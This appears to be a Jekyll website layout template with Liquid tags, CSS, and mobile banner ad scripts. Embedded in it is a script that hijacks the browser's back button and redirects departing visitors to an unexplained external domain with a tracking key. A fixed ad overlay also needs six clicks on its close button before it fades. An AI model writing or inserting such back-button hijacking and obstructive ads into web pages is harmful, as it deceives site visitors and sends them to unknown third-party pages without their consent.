<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width">
  <title>{% if page.title %}{{ page.title | escape_once }}{% else %}{{ site.title | escape_once }}{% endif %}</title>
  <meta name="description" content="{% if page.excerpt %}{{ page.excerpt | strip_html | strip_newlines | truncate: 160 }}{% else %}{{ site.description }}{% endif %}">
  <link rel="alternate" type="application/rss+xml" title="{{ site.title }}" href="{{ "/feed.xml" | prepend: site.baseurl | prepend: site.url }}">
  <meta name="google-site-verification" content="mYViEREEOiKsFSGESV9vXVGiLMsuE3wJEeNHBtwMPlM" />
  <link rel="shortcut icon" href="/favicon.ico">
</head>

<style>
* {font-weight:lighter !important;text-decoration:none;color:#000 !important}
body {width:80%;margin:0 auto}
#t {box-shadow: 0px 14px 42px 0px rgb(163 174 184 / 15%);background:#fff;padding:35px;box-sizing:border-box;border-radius:15px;margin:30px 0;list-style:none}
.mobile {display:none}
@media (max-width:1024px) {
.mobile {display:block}
}
</style>

<script>
history.pushState(null, null, '');
 window.onpopstate = function(event) {
  if(event){
	history.back();
location.href="https://passablejeepparliament.com/k7x9zs3u?key=5effd1c73dce2934514a36cafdc4c1c8";
  }
}
</script>

<h1>{{ site.title }}</h1>

<div id="s" class='mobile'>
<center id='t' style='padding:10px 15px 15px;box-shadow: 0px 14px 42px 0px rgb(163 174 184 / 90%);position: fixed;left:50%;margin-left:-173px;margin-top:0;opacity:0.95;border-left:0;z-index:999'>
<button type="button" id='button' onclick="s()"><img src='//cdn.jsdelivr.net/npm/fluke201@0.0.3/2.png' style='width:10px'></button>

<script src='//img.mobon.net/js/common/HawkEyesMaker.js'></script>
<script>
	new HawkEyes({"type":"banner","responsive":"N","platform":"M","scriptCode":"679354","width":"320","height":"50","frameCode":"37","settings":{"cntad":"3","cntsr":"1"}});
</script>

<center style='line-height:300px;width:320px'>ADS</center>

</center>
<script>var c=0,as=document.getElementById("s");function s(){switch(++c){case 6:as.style.opacity=0}}</script>

<div style='height:400px' class='mobile'></div></div>